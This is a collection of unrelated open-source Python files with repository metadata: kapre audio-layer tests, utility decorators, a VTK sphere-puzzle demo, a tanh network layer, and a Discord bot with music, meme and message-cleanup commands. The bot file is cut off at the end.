"alnum_prop": 0.684053651266766,
"repo_name": "google/compare_gan",
"id": "24eac61b8b9660ed69ed48761219434485ef406f",
"size": "3960",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "compare_gan/datasets_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "104178"
},
{
"name": "Python",
"bytes": "460414"
}
],
"symlink_target": ""
}
|
import pytest
import numpy as np
import tensorflow as tf
import librosa
from kapre import Frame, Energy, MuLawEncoding, MuLawDecoding, LogmelToMFCC
from kapre.backend import _CH_FIRST_STR, _CH_LAST_STR, _CH_DEFAULT_STR
from utils import get_audio, save_load_compare
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('frame_length', [50, 32])
def test_frame_correctness(frame_length, data_format):
hop_length = frame_length // 2
n_ch = 1
src_mono, batch_src, input_shape = get_audio(data_format=data_format, n_ch=n_ch, length=1000)
model = tf.keras.Sequential()
model.add(
Frame(
frame_length=frame_length,
hop_length=hop_length,
pad_end=False,
data_format=data_format,
input_shape=input_shape,
)
)
frames_ref = librosa.util.frame(src_mono, frame_length, hop_length).T # (time, frame_length)
if data_format in (_CH_DEFAULT_STR, _CH_LAST_STR):
frames_ref = np.expand_dims(frames_ref, axis=2)
else:
frames_ref = np.expand_dims(frames_ref, axis=0)
frames_kapre = model.predict(batch_src)[0]
np.testing.assert_equal(frames_kapre, frames_ref)
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
def test_energy_correctness(data_format):
frame_length = 4
hop_length = frame_length // 2
n_ch = 1
src_mono, batch_src, input_shape = get_audio(
data_format=data_format, n_ch=n_ch, length=frame_length * 2
)
sr = 22050
ref_duration = 0.1
model = tf.keras.Sequential()
model.add(
Energy(
sample_rate=sr,
ref_duration=ref_duration,
frame_length=frame_length,
hop_length=hop_length,
pad_end=False,
data_format=data_format,
input_shape=input_shape,
)
)
energies_kapre = model.predict(batch_src)[0]
frames_ref = librosa.util.frame(src_mono, frame_length, hop_length).T # (time, frame_length)
nor_coeff = ref_duration / (frame_length / sr)
energies_ref = nor_coeff * np.sum(frames_ref ** 2, axis=1) # (time, )
if data_format in (_CH_DEFAULT_STR, _CH_LAST_STR):
energies_ref = np.expand_dims(energies_ref, axis=1)
else:
energies_ref = np.expand_dims(energies_ref, axis=0)
np.testing.assert_allclose(energies_kapre, energies_ref, atol=1e-5)
# @pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('data_format', ['default'])
@pytest.mark.parametrize('n_mfccs', [1, 20, 40])
def test_mfcc_correctness(data_format, n_mfccs):
src_mono, batch_src, input_shape = get_audio(data_format='channels_last', n_ch=1)
melgram = librosa.power_to_db(librosa.feature.melspectrogram(src_mono)) # mel, time
mfcc_ref = librosa.feature.mfcc(
S=melgram, n_mfcc=n_mfccs, norm='ortho'
) # 'ortho' -> 5% mismatch but..
expand_dim = (0, 3) if data_format in (_CH_LAST_STR, _CH_DEFAULT_STR) else (0, 1)
melgram_batch = np.expand_dims(melgram.T, expand_dim)
model = tf.keras.Sequential()
model.add(
LogmelToMFCC(n_mfccs=n_mfccs, data_format=data_format, input_shape=melgram_batch.shape[1:])
)
mfcc_kapre = model.predict(melgram_batch)
ch_axis = 1 if data_format == _CH_FIRST_STR else 3
mfcc_kapre = np.squeeze(mfcc_kapre, axis=ch_axis)
mfcc_kapre = mfcc_kapre[0].T
if n_mfccs > 1:
np.testing.assert_allclose(mfcc_ref[1:], mfcc_kapre[1:], atol=1e-4)
np.testing.assert_allclose(mfcc_ref[0], mfcc_kapre[0] / np.sqrt(2.0), atol=1e-4)
@pytest.mark.parametrize('data_format', ['default', 'channels_first', 'channels_last'])
@pytest.mark.parametrize('save_format', ['tf', 'h5'])
def test_save_load(data_format, save_format):
src_mono, batch_src, input_shape = get_audio(data_format='channels_last', n_ch=1)
# test Frame save/load
save_load_compare(
Frame(frame_length=128, hop_length=64, input_shape=input_shape),
batch_src,
np.testing.assert_allclose,
save_format,
Frame,
)
# test Energy save/load
save_load_compare(
Energy(frame_length=128, hop_length=64, input_shape=input_shape),
batch_src,
np.testing.assert_allclose,
save_format,
Energy,
)
# test mu law layers
save_load_compare(
MuLawEncoding(quantization_channels=128),
batch_src,
np.testing.assert_allclose,
save_format,
MuLawEncoding,
)
save_load_compare(
MuLawDecoding(quantization_channels=128),
np.arange(0, 256, 1).reshape((1, 256, 1)),
np.testing.assert_allclose,
save_format,
MuLawDecoding,
)
# test mfcc layer
expand_dim = (0, 3) if data_format in (_CH_LAST_STR, _CH_DEFAULT_STR) else (0, 1)
save_load_compare(
LogmelToMFCC(n_mfccs=10),
np.expand_dims(librosa.power_to_db(librosa.feature.melspectrogram(src_mono).T), expand_dim),
np.testing.assert_allclose,
save_format,
LogmelToMFCC,
)
@pytest.mark.xfail()
def test_wrong_data_format():
Frame(32, 16, data_format='wrong_string')
|
{
"content_hash": "432e9f911d59c247466f80baf573eb39",
"timestamp": "",
"source": "github",
"line_count": 157,
"max_line_length": 100,
"avg_line_length": 33.52229299363057,
"alnum_prop": 0.6349990499714991,
"repo_name": "keunwoochoi/kapre",
"id": "cb2322b7c9f2422b3335d9d24f3e295b33caa1d2",
"size": "5263",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_signal.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "150415"
},
{
"name": "Shell",
"bytes": "96"
}
],
"symlink_target": ""
}
|
from functools import wraps
import inspect
RED = '\033[91m'
BLUE = '\033[94m'
BOLD = '\033[1m'
END = '\033[0m'
def _default_handler(e, *args, **kwargs):
pass
def silence(target_exceptions:list, exception_handler=_default_handler):
def decor(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as e:
if isinstance(target_exceptions, list):
for each in target_exceptions:
if isinstance(e, each):
return exception_handler(e, *args, **kwargs)
else:
if isinstance(e, target_exceptions):
return exception_handler(e, *args, **kwargs)
raise e
return wrapper
return decor
def silence_coroutine(target_exceptions:list, exception_handler=_default_handler):
def decor(func):
@wraps(func)
def wrapper(*args, **kwargs):
try:
return (yield from func(*args, **kwargs))
except Exception as e:
if isinstance(target_exceptions, list):
for each in target_exceptions:
if isinstance(e, each):
return exception_handler(e, *args, **kwargs)
else:
if isinstance(e, target_exceptions):
return exception_handler(e, *args, **kwargs)
raise e
return wrapper
return decor
def log(fn):
"""
logs parameters and result - takes no arguments
"""
TAB_WIDTH = ' '
def func(*args, **kwargs):
if '_DEBUG' in globals() and _DEBUG == True:
            arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self":
arg_string += f"{var_name} = {args[i]} : {type(args[i])},"
if len(kwargs):
string = f"{RED}{BOLD}->{END} Calling {fn.__code__.co_name}({arg_string[0:-1]} {kwargs})"
else:
string = f"{RED}{BOLD}->{END} Calling {fn.__code__.co_name}({arg_string[0:-1]})"
offset = TAB_WIDTH * len(inspect.stack(0))
string = offset + string
print(string)
result = fn(*args, **kwargs)
result_string = f"{BLUE}{BOLD}<-{END} {fn.__code__.co_name} returned: {result}"
offset = TAB_WIDTH * len(inspect.stack(0))
result_string = offset + result_string
print(result_string)
return result
else:
return fn(*args, **kwargs)
return func
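# Usage sketch (hypothetical function; logging only happens when _DEBUG = True
# is set in this module's namespace, otherwise the call passes through):
#
#   @log
#   def add(a, b):
#       return a + b
#
# add(1, 2) prints the call and its result, indented by the current call depth.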
def logx(supress_args=[], supress_all_args=False, supress_result=False, receiver=None):
"""
logs parameters and result
takes arguments
supress_args - list of parameter names to supress
supress_all_args - boolean to supress all arguments
supress_result - boolean to supress result
receiver - custom logging function which takes a string as input; defaults to logging on stdout
"""
def decorator(fn):
def func(*args, **kwargs):
if not supress_all_args:
arg_string = ""
for i in range(0, len(args)):
var_name = fn.__code__.co_varnames[i]
if var_name != "self" and var_name not in supress_args:
arg_string += var_name + ":" + str(args[i]) + ","
arg_string = arg_string[0:len(arg_string) - 1]
string = (RED + BOLD + '>> ' + END + 'Calling {0}({1})'.format(fn.__code__.co_name, arg_string))
if len(kwargs):
string = (
RED + BOLD + '>> ' + END + 'Calling {0} with args {1} and kwargs {2}'.format(
fn.__code__.co_name,
arg_string, kwargs))
if receiver:
receiver(string)
else:
print(string)
result = fn(*args, **kwargs)
if not supress_result:
string = BLUE + BOLD + '<< ' + END + 'Return {0} with result :{1}'.format(fn.__code__.co_name, result)
if receiver:
receiver(string)
else:
print(string)
return result
return func
return decorator
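# Usage sketch (hypothetical function and argument names):
#
#   @logx(supress_args=['password'], supress_result=True)
#   def login(user, password):
#       ...
#
# Calling login('alice', 'secret') logs the call with ``password`` hidden and
# the return value suppressed.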
def value_check(arg_name, pos, allowed_values):
"""
allows value checking at runtime for args or kwargs
"""
def decorator(fn):
# brevity compromised in favour of readability
def logic(*args, **kwargs):
arg_count = len(args)
if arg_count:
if pos < arg_count:
if args[pos] in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError(
"'{0}' at position {1} not in allowed values {2}".format(args[pos], pos, allowed_values))
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if value in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError("'{0}' is not an allowed kwarg".format(arg_name))
else:
# partially applied functions because of incomplete args, let python handle this
return fn(*args, **kwargs)
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if value in allowed_values:
return fn(*args, **kwargs)
else:
raise ValueError("'{0}' is not an allowed kwarg".format(arg_name))
return logic
return decorator
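# Usage sketch (hypothetical function):
#
#   @value_check('mode', 0, ['r', 'w'])
#   def open_stream(mode):
#       ...
#
# open_stream('x') raises ValueError because 'x' is not among the allowed values.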
def type_check(arg_name, pos, reqd_type):
"""
allows type checking at runtime for args or kwargs
"""
def decorator(fn):
# brevity compromised in favour of readability
def logic(*args, **kwargs):
arg_count = len(args)
if arg_count:
if pos < arg_count:
if isinstance(args[pos], reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' at position {1} not of type {2}".format(args[pos], pos, reqd_type))
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if isinstance(value, reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' is not of type {1}".format(arg_name, reqd_type))
else:
# partially applied functions because of incomplete args, let python handle this
return fn(*args, **kwargs)
else:
if arg_name in kwargs:
value = kwargs[arg_name]
if isinstance(value, reqd_type):
return fn(*args, **kwargs)
else:
raise TypeError("'{0}' is not of type {1}".format(arg_name, reqd_type))
return logic
return decorator
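# Illustrative usage sketch (names invented for the example): enforce at call time
# that the first argument is an int, whether passed positionally or as a keyword;
# anything else raises TypeError.
def _example_type_check_usage():
    @type_check('count', 0, int)
    def repeat(count):
        return 'x' * count
    repeat(3)        # ok
    repeat(count=2)  # ok
    return repeat    # repeat('3') would raise TypeError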
|
{
"content_hash": "763f9ad78e884731cc7d3df24dd5dd40",
"timestamp": "",
"source": "github",
"line_count": 210,
"max_line_length": 118,
"avg_line_length": 35.65714285714286,
"alnum_prop": 0.4776976495726496,
"repo_name": "kashifrazzaqui/again",
"id": "d435845bc92aea8f3076861327cad1739c418734",
"size": "7488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "again/decorate.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "21910"
}
],
"symlink_target": ""
}
|
# A game with VTK and tkinter. :)
import sys
if sys.hexversion < 0x03000000:
# for Python2
import Tkinter as tkinter
else:
# for Python3
import tkinter
import vtk
from vtk.tk.vtkTkRenderWindowInteractor import vtkTkRenderWindowInteractor
# Create the pipeline
puzzle = vtk.vtkSpherePuzzle()
mapper = vtk.vtkPolyDataMapper()
mapper.SetInputConnection(puzzle.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
arrows = vtk.vtkSpherePuzzleArrows()
mapper2 = vtk.vtkPolyDataMapper()
mapper2.SetInputConnection(arrows.GetOutputPort())
actor2 = vtk.vtkActor()
actor2.SetMapper(mapper2)
renWin = vtk.vtkRenderWindow()
ren = vtk.vtkRenderer()
renWin.AddRenderer(ren)
# Add the actors to the renderer, set the background and size
ren.AddActor(actor)
ren.AddActor(actor2)
ren.SetBackground(0.1, 0.2, 0.4)
ren.ResetCamera()
cam = ren.GetActiveCamera()
cam.Elevation(-40)
## Generate the GUI
root = tkinter.Tk()
root.withdraw()
# Define a quit method that exits cleanly.
def quit(obj=root):
obj.quit()
# Create the toplevel window
top = tkinter.Toplevel(root)
top.title("Sphere Puzzle")
top.protocol("WM_DELETE_WINDOW", quit)
# Create some frames
f1 = tkinter.Frame(top)
f2 = tkinter.Frame(top)
f1.pack(side="top", anchor="n", expand=1, fill="both")
f2.pack(side="bottom", anchor="s", expand="t", fill="x")
# Create the Tk render widget, and bind the events
rw = vtkTkRenderWindowInteractor(f1, width=400, height=400, rw=renWin)
rw.pack(expand="t", fill="both")
def reset(evt=None):
puzzle.Reset()
renWin.Render()
# Display some information
l1 = tkinter.Label(f2, text="Position cursor over the rotation plane.")
l2 = tkinter.Label(f2, text="Moving pieces will be highlighted.")
l3 = tkinter.Label(f2, text="Press 'm' to make a move.")
# Keep the button in its own name so it does not shadow the reset() callback above.
b0 = tkinter.Button(f2, text="Reset", command=reset)
b1 = tkinter.Button(f2, text="Quit", command=quit)
for i in (l1, l2, l3, b0, b1):
i.pack(side="top", expand="t", fill="x")
# Done with the GUI. Create callback functions.
in_piece_rotation = 0
LastVal = None
# Highlight pieces
def MotionCallback(obj, event):
global in_piece_rotation
global LastVal
if in_piece_rotation:
return
iren = renWin.GetInteractor()
istyle = iren.GetInteractorStyle().GetCurrentStyle()
# Return if the user is performing interaction
if istyle.GetState():
return
# Get mouse position
pos = iren.GetEventPosition()
x, y = pos
# Get world point
ren.SetDisplayPoint(x, y, ren.GetZ(x, y))
ren.DisplayToWorld()
pt = ren.GetWorldPoint()
val = puzzle.SetPoint(pt[0], pt[1], pt[2])
if (not LastVal) or val != LastVal:
renWin.Render()
LastVal = val
# Rotate the puzzle
def CharCallback(obj, event):
iren = renWin.GetInteractor()
keycode = iren.GetKeyCode()
if keycode != "m" and keycode != "M":
return
pos = iren.GetEventPosition()
ButtonCallback(pos[0], pos[1])
def ButtonCallback(x, y):
global in_piece_rotation
if in_piece_rotation:
return
in_piece_rotation = 1
# Get world point
ren.SetDisplayPoint(x, y, ren.GetZ(x,y))
ren.DisplayToWorld()
pt = ren.GetWorldPoint()
x, y, z = pt[:3]
for i in range(0, 101, 10):
puzzle.SetPoint(x, y, z)
puzzle.MovePoint(i)
renWin.Render()
root.update()
in_piece_rotation = 0
root.update()
# Modify some bindings, use the interactor style 'switch'
iren = renWin.GetInteractor()
istyle = vtk.vtkInteractorStyleSwitch()
iren.SetInteractorStyle(istyle)
istyle.SetCurrentStyleToTrackballCamera()
iren.AddObserver("MouseMoveEvent", MotionCallback)
iren.AddObserver("CharEvent", CharCallback)
# Shuffle the puzzle
ButtonCallback(218, 195)
ButtonCallback(261, 128)
ButtonCallback(213, 107)
ButtonCallback(203, 162)
ButtonCallback(134, 186)
iren.Initialize()
renWin.Render()
iren.Start()
root.mainloop()
|
{
"content_hash": "f7f7718f5de65549a817cfbaa36a266b",
"timestamp": "",
"source": "github",
"line_count": 168,
"max_line_length": 74,
"avg_line_length": 24.339285714285715,
"alnum_prop": 0.669601369528002,
"repo_name": "hlzz/dotfiles",
"id": "f2bdcc34c1bd374830cd3cf0ff1b2282779e5eef",
"size": "4112",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "graphics/VTK-7.0.0/Examples/Modelling/Python/SpherePuzzle.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "AppleScript",
"bytes": "1240"
},
{
"name": "Arc",
"bytes": "38"
},
{
"name": "Assembly",
"bytes": "449468"
},
{
"name": "Batchfile",
"bytes": "16152"
},
{
"name": "C",
"bytes": "102303195"
},
{
"name": "C++",
"bytes": "155056606"
},
{
"name": "CMake",
"bytes": "7200627"
},
{
"name": "CSS",
"bytes": "179330"
},
{
"name": "Cuda",
"bytes": "30026"
},
{
"name": "D",
"bytes": "2152"
},
{
"name": "Emacs Lisp",
"bytes": "14892"
},
{
"name": "FORTRAN",
"bytes": "5276"
},
{
"name": "Forth",
"bytes": "3637"
},
{
"name": "GAP",
"bytes": "14495"
},
{
"name": "GLSL",
"bytes": "438205"
},
{
"name": "Gnuplot",
"bytes": "327"
},
{
"name": "Groff",
"bytes": "518260"
},
{
"name": "HLSL",
"bytes": "965"
},
{
"name": "HTML",
"bytes": "2003175"
},
{
"name": "Haskell",
"bytes": "10370"
},
{
"name": "IDL",
"bytes": "2466"
},
{
"name": "Java",
"bytes": "219109"
},
{
"name": "JavaScript",
"bytes": "1618007"
},
{
"name": "Lex",
"bytes": "119058"
},
{
"name": "Lua",
"bytes": "23167"
},
{
"name": "M",
"bytes": "1080"
},
{
"name": "M4",
"bytes": "292475"
},
{
"name": "Makefile",
"bytes": "7112810"
},
{
"name": "Matlab",
"bytes": "1582"
},
{
"name": "NSIS",
"bytes": "34176"
},
{
"name": "Objective-C",
"bytes": "65312"
},
{
"name": "Objective-C++",
"bytes": "269995"
},
{
"name": "PAWN",
"bytes": "4107117"
},
{
"name": "PHP",
"bytes": "2690"
},
{
"name": "Pascal",
"bytes": "5054"
},
{
"name": "Perl",
"bytes": "485508"
},
{
"name": "Pike",
"bytes": "1338"
},
{
"name": "Prolog",
"bytes": "5284"
},
{
"name": "Python",
"bytes": "16799659"
},
{
"name": "QMake",
"bytes": "89858"
},
{
"name": "Rebol",
"bytes": "291"
},
{
"name": "Ruby",
"bytes": "21590"
},
{
"name": "Scilab",
"bytes": "120244"
},
{
"name": "Shell",
"bytes": "2266191"
},
{
"name": "Slash",
"bytes": "1536"
},
{
"name": "Smarty",
"bytes": "1368"
},
{
"name": "Swift",
"bytes": "331"
},
{
"name": "Tcl",
"bytes": "1911873"
},
{
"name": "TeX",
"bytes": "11981"
},
{
"name": "Verilog",
"bytes": "3893"
},
{
"name": "VimL",
"bytes": "595114"
},
{
"name": "XSLT",
"bytes": "62675"
},
{
"name": "Yacc",
"bytes": "307000"
},
{
"name": "eC",
"bytes": "366863"
}
],
"symlink_target": ""
}
|
import numpy as np
class HyperbolicTangentLayer(object):
"""A layer that applies tanh element-wise.
This layer has fixed scaling parameters for the tanh and
does not adjust weights during training.
"""
def __init__(self, m=2/3, alpha=1.7159, beta=0):
"""Create new HyperbolicTangentLayer.
Can specify scaling parameters m, alpha and beta:
output = alpha * tanh(m * input) + beta * input.
"""
self.m = m
self.alpha = alpha
self.beta = beta
def forward_prop(self, data):
self.newdata = self.alpha * np.tanh(self.m * data)
return self.newdata + self.beta * data
    def back_prop(self, data, learning_rate=0):
        # d/dx [alpha*tanh(m*x) + beta*x] = m*alpha*(1 - tanh(m*x)**2) + beta;
        # with newdata = alpha*tanh(m*x) this is m*alpha - m*newdata**2/alpha + beta.
        return data * (self.m * self.alpha -
                       (self.m * self.newdata**2) / self.alpha + self.beta)
def pprint(self):
print(
"tangent hyperbolicus layer with m=",
self.m,
"and alpha=",
self.alpha,
"and beta=",
self.beta)
class HyperbolicTangentLayerSHAPE(object):
"""A layer that applies tanh element-wise.
This layer has fixed scaling parameters for the tanh and
does not adjust weights during training.
"""
def __init__(self, in_shape, m=2/3, alpha=1.7159, beta=0):
"""Create new HyperbolicTangentLayer.
Can specify scaling parameters m, alpha and beta:
output = alpha * tanh(m * input) + beta * input.
"""
        self.in_shape = in_shape
        self.out_shape = in_shape  # element-wise tanh preserves the shape
self.m = m
self.alpha = alpha
self.beta = beta
def forward_prop(self, data):
self.newdata = self.alpha * np.tanh(self.m * data)
return self.newdata + self.beta * data
    def back_prop(self, data, learning_rate=0):
        # d/dx [alpha*tanh(m*x) + beta*x] = m*alpha*(1 - tanh(m*x)**2) + beta;
        # with newdata = alpha*tanh(m*x) this is m*alpha - m*newdata**2/alpha + beta.
        return data * (self.m * self.alpha -
                       (self.m * self.newdata**2) / self.alpha + self.beta)
def pprint(self):
print(
"tangent hyperbolicus layer with m=",
self.m,
"and alpha=",
self.alpha,
"and beta=",
self.beta,
"and in_shape = out_shape =",
self.in_shape)
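# Minimal usage sketch (not part of the original module): push a small array through
# the layer and propagate a gradient of ones back. With the defaults alpha=1.7159,
# m=2/3 and beta=0 the forward output stays roughly within (-1.7159, 1.7159).
if __name__ == '__main__':
    layer = HyperbolicTangentLayer()
    x = np.array([[-2.0, 0.0, 2.0]])
    out = layer.forward_prop(x)                   # alpha * tanh(m * x) + beta * x
    grad_in = layer.back_prop(np.ones_like(out))  # gradient w.r.t. the layer input
    layer.pprint()
    print(out, grad_in)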
|
{
"content_hash": "037d2be7728e8be4eee6e2a61ea97277",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 62,
"avg_line_length": 29.743243243243242,
"alnum_prop": 0.5533848250795094,
"repo_name": "Knuppknou/academia_ai",
"id": "6d6e55687d2d6226e44183690c5a8a8e1cc806c0",
"size": "2201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "academia_ai/neural_network/layers/hyperbolic_tangent.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "2208240"
},
{
"name": "Python",
"bytes": "57531"
}
],
"symlink_target": ""
}
|
import asyncio
import discord
import random
import scrims
from discord.ext import commands
class VoiceEntry:
def __init__(self, message, player):
self.requester = message.author
self.channel = message.channel
self.player = player
def __str__(self):
fmt = '*{0.title}* uploaded by {0.uploader} and requested by {1.display_name}'
duration = self.player.duration
if duration:
fmt = fmt + ' [length: {0[0]}m {0[1]}s]'.format(divmod(duration, 60))
return fmt.format(self.player, self.requester)
class VoiceState:
def __init__(self, bot):
self.current = None
self.voice = None
self.bot = bot
self.play_next_song = asyncio.Event()
self.songs = asyncio.Queue()
self.skip_votes = set() # a set of user_ids that voted
self.audio_player = self.bot.loop.create_task(self.audio_player_task())
def is_playing(self):
if self.voice is None or self.current is None:
return False
player = self.current.player
return not player.is_done()
@property
def player(self):
return self.current.player
def skip(self):
self.skip_votes.clear()
if self.is_playing():
self.player.stop()
def toggle_next(self):
self.bot.loop.call_soon_threadsafe(self.play_next_song.set)
async def audio_player_task(self):
while True:
self.play_next_song.clear()
self.current = await self.songs.get()
await self.bot.send_message(self.current.channel, 'Now playing ' + str(self.current))
self.current.player.start()
await self.play_next_song.wait()
class Music:
"""Voice related commands.
Works in multiple servers at once.
"""
def __init__(self, bot):
self.bot = bot
self.voice_states = {}
def get_voice_state(self, server):
state = self.voice_states.get(server.id)
if state is None:
state = VoiceState(self.bot)
self.voice_states[server.id] = state
return state
async def create_voice_client(self, channel):
voice = await self.bot.join_voice_channel(channel)
state = self.get_voice_state(channel.server)
state.voice = voice
def __unload(self):
for state in self.voice_states.values():
try:
state.audio_player.cancel()
if state.voice:
self.bot.loop.create_task(state.voice.disconnect())
except:
pass
@commands.command(pass_context=True, no_pm=True)
async def join(self, ctx, *, channel : discord.Channel):
"""Joins a voice channel."""
try:
await self.create_voice_client(channel)
except discord.ClientException:
await self.bot.say('Already in a voice channel...')
except discord.InvalidArgument:
await self.bot.say('This is not a voice channel...')
else:
await self.bot.say('Ready to play audio in ' + channel.name)
@commands.command(pass_context=True, no_pm=True)
async def summon(self, ctx):
"""Summons the bot to join your voice channel."""
summoned_channel = ctx.message.author.voice_channel
if summoned_channel is None:
await self.bot.say('You are not in a voice channel.')
return False
state = self.get_voice_state(ctx.message.server)
if state.voice is None:
state.voice = await self.bot.join_voice_channel(summoned_channel)
else:
await state.voice.move_to(summoned_channel)
return True
@commands.command(pass_context=True, no_pm=True)
async def play(self, ctx, *, song : str):
"""Plays a song.
        If a song is already playing, the new request is queued
        until the current song is done playing.
This command automatically searches as well from YouTube.
The list of supported sites can be found here:
https://rg3.github.io/youtube-dl/supportedsites.html
"""
state = self.get_voice_state(ctx.message.server)
opts = {
'default_search': 'auto',
'quiet': True,
}
if state.voice is None:
success = await ctx.invoke(self.summon)
if not success:
return
try:
player = await state.voice.create_ytdl_player(song, ytdl_options=opts, after=state.toggle_next)
except Exception as e:
fmt = 'An error occurred while processing this request: ```py\n{}: {}\n```'
await self.bot.send_message(ctx.message.channel, fmt.format(type(e).__name__, e))
else:
player.volume = 0.6
entry = VoiceEntry(ctx.message, player)
await self.bot.say('Enqueued ' + str(entry))
await state.songs.put(entry)
@commands.command(pass_context=True, no_pm=True)
async def volume(self, ctx, value : int):
"""Sets the volume of the currently playing song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.volume = value / 100
await self.bot.say('Set the volume to {:.0%}'.format(player.volume))
@commands.command(pass_context=True, no_pm=True)
async def pause(self, ctx):
"""Pauses the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.pause()
@commands.command(pass_context=True, no_pm=True)
async def resume(self, ctx):
"""Resumes the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.is_playing():
player = state.player
player.resume()
@commands.command(pass_context=True, no_pm=True)
async def stop(self, ctx):
"""Stops playing audio and leaves the voice channel.
This also clears the queue.
"""
server = ctx.message.server
state = self.get_voice_state(server)
if state.is_playing():
player = state.player
player.stop()
try:
state.audio_player.cancel()
del self.voice_states[server.id]
await state.voice.disconnect()
except:
pass
@commands.command(pass_context=True, no_pm=True)
async def skip(self, ctx):
"""Vote to skip a song. The song requester can automatically skip.
3 skip votes are needed for the song to be skipped.
"""
state = self.get_voice_state(ctx.message.server)
if not state.is_playing():
await self.bot.say('Not playing any music right now...')
return
voter = ctx.message.author
if voter == state.current.requester:
await self.bot.say('Requester requested skipping song...')
state.skip()
elif voter.id not in state.skip_votes:
state.skip_votes.add(voter.id)
total_votes = len(state.skip_votes)
if total_votes >= 3:
await self.bot.say('Skip vote passed, skipping song...')
state.skip()
else:
await self.bot.say('Skip vote added, currently at [{}/3]'.format(total_votes))
else:
await self.bot.say('You have already voted to skip this song.')
@commands.command(pass_context=True, no_pm=True)
async def playing(self, ctx):
"""Shows info about the currently played song."""
state = self.get_voice_state(ctx.message.server)
if state.current is None:
await self.bot.say('Not playing anything.')
else:
skip_count = len(state.skip_votes)
await self.bot.say('Now playing {} [skips: {}/3]'.format(state.current, skip_count))
@commands.command(pass_context=True, no_pm=True)
    async def fart(self, ctx, channel: discord.Channel):
        """Under Construction"""
        # Assumes the bot is already connected to a voice channel on this server.
        state = self.get_voice_state(ctx.message.server)
        player = state.voice.create_ffmpeg_player('fart.mp3')  # play local mp3
        player.start()
class ChatBot:
"""Chat commands"""
def __init__(self, bot):
self.bot = bot
@commands.command(pass_context=True, no_pm=False)
async def hello(self, ctx):
"""Greet your favorite bot"""
name = ctx.message.author.name
return await self.bot.say("Hello {}!".format(name))
@commands.command(pass_context=True, no_pm=True)
async def flipcoin(self, ctx):
"""Totally unbiased coin flip"""
return await self.bot.say("Killdu Wins!")
@commands.command(pass_context=True, no_pm=True)
async def rolldice(self, ctx):
"""Returns random int from 1-6"""
roll = random.randint(1, 6)
return await self.bot.say('You rolled a {}'.format(roll))
@commands.command(pass_context=True, no_pm=True)
    async def choose(self, ctx, *choices : str):
        """Picks random option !choose opt1 opt2 ..."""
        if not choices:
            return await self.bot.say('Give me at least one option to choose from!')
        return await self.bot.say(random.choice(choices))
@commands.command(pass_context=True, no_pm=True)
async def memeME(self, ctx, *args):
"""Posts a random meme from the meme library"""
lines = open('memeLib.txt').read().splitlines()
myline = random.choice(lines)
return await self.bot.say(myline)
@commands.command(pass_context=True, no_pm=True)
async def addmeme(self, ctx):
"""Add a URL to the meme library"""
with open('memeLib.txt', 'a') as file:
            s = list(ctx.message.content)  # convert the message into a list of chars
            while (s[0] != ' '):  # delete characters up to the first space to strip the command from the content
s.pop(0)
s.pop(0)
newS = ''.join(s)
file.write('\n')
file.write(newS)
return await self.bot.say('Your meme was successfully added')
@commands.command(pass_context=True, no_pm=True)
async def delmsgs(self, ctx, *args):
"""deletes the last (ammount) of messages"""
try:
ammount = int(args[0]) + 1 if len(args) > 0 else 2
except:
await self.bot.send_message(ctx.message.channel, embed=discord.Embed(color=discord.Color.red(), descrition="Please enter a valid value for message ammount!"))
return
cleared = 0
failed = 0
async for m in self.bot.logs_from(ctx.message.channel, limit=ammount):
try:
await self.bot.delete_message(m)
cleared += 1
except:
failed += 1
pass
failed_str = "\n\nFailed to clear %s message(s)." % failed if failed > 0 else ""
returnmsg = await self.bot.send_message(ctx.message.channel, embed=discord.Embed(color=discord.Color.blue(), description="Cleared %s message(s).%s" % (cleared, failed_str)))
await asyncio.sleep(4)
await self.bot.delete_message(returnmsg)
@commands.command(pass_context=True, no_pm=True)
async def esportsready(self, ctx, *args):
"""Posts oversized "esports ready" emote"""
async for m in self.bot.logs_from(ctx.message.channel, limit=1):
await self.bot.delete_message(m)
return await self.bot.say("https://cdn.discordapp.com/attachments/364645055841173505/368252323044261888/eSportsReady.png")
@commands.command(pass_context=True, no_pm=True)
async def parkour(self, ctx):
"""Parkour"""
        await self.bot.delete_message(ctx.message)  # delete the invoking command message
return await self.bot.say("Hardcore Parkour! https://www.youtube.com/watch?v=0Kvw2BPKjz0")
@commands.command(pass_context=True, no_pm=False)
    async def LFS(self, ctx, start="", end="", dayofweek=""):
        """Looking for scrim: record availability (start, end, day of week)"""
        name = ctx.message.author
        # Assumes the imported scrims module provides an insert_scrim coroutine.
        await scrims.insert_scrim(name, start, end, dayofweek)
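# Minimal wiring sketch (assumption: token handling and the launcher normally live in
# a separate script that is not part of this file); it only shows how these cogs
# would be attached to an async-era (0.16) discord.py commands.Bot.
if __name__ == '__main__':
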